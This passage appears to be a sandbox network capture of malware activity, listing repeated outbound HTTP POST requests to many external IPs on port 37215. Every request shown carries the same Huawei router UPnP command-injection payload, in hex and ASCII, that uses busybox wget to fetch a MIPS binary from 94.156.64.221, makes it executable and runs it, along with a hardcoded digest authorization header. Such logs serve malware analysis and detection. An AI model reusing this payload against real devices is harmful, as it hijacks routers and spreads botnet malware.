                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    689192.168.2.233924841.95.96.11537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308000088 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    690192.168.2.2346284156.113.114.13737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308032990 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    691192.168.2.235703641.97.81.10337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308065891 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    692192.168.2.2336302156.166.201.24637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308094025 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    693192.168.2.2348752197.198.161.20537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308136940 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    694192.168.2.234530241.114.72.17037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308237076 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    695192.168.2.2345824156.126.49.3437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308317900 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    696192.168.2.233515041.4.150.2537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308362007 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    697192.168.2.2360204197.159.189.24337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308392048 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    698192.168.2.235984841.145.26.9837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308432102 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
